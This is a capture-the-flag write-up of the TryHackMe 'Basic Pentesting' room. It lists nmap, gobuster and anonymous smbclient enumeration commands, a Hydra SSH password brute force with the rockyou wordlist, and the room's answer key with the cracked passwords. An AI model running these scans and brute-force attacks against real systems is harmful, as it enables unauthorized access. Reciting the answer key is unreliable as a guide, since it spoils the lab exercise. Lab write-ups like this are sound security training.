Post

Tryhackme: Basic Pentesting

Tryhackme: Basic Pentesting

Tryhackme: Basic Pentesting — 17 June 2025

TryHackMe Logo

Basic Pentesting


🕵️ Web App Testing & Privilege Escalation — Task 1

🔍 Nmap Scan

Command:

1
sudo nmap -T4 -n -sC -sV -Pn -p- -oN networkScan.txt 10.10.242.113

Nmap Scan Screenshot


📂 Directory Scan (Gobuster)

Command:

1
gobuster dir -u http://10.10.93.33/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt -o directory_scan.txt

Directory Scan Screenshot


🗂️ SMB Enumeration

List SMB Shares:

1
smbclient -L //10.10.125.85/ -N

SMB Shares

Access Anonymous Share:

1
smbclient //10.10.125.85/Anonymous -N

SMB Anonymous SMB Anonymous Terminal


🔑 SSH Password Crack (Hydra)

Command:

1
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.242.113

Hydra SSH Crack


❓ Questions and Answers

#QuestionAnswer
1What is the name of the hidden directory on the web server (no /)?development
2What is the username?jan
3What is the password?armando
4What service do you use to access the server (abbreviation, all caps)?SSH
5What is the name of the other user you found (all lower case)?kay
6What is the final password you obtain?heresareallystrongpasswordthatfollowsthepasswordpolicy$$

🎉 Happy Hacking!

Charlie Hunnam GIF

This post is licensed under CC BY 4.0 by the author.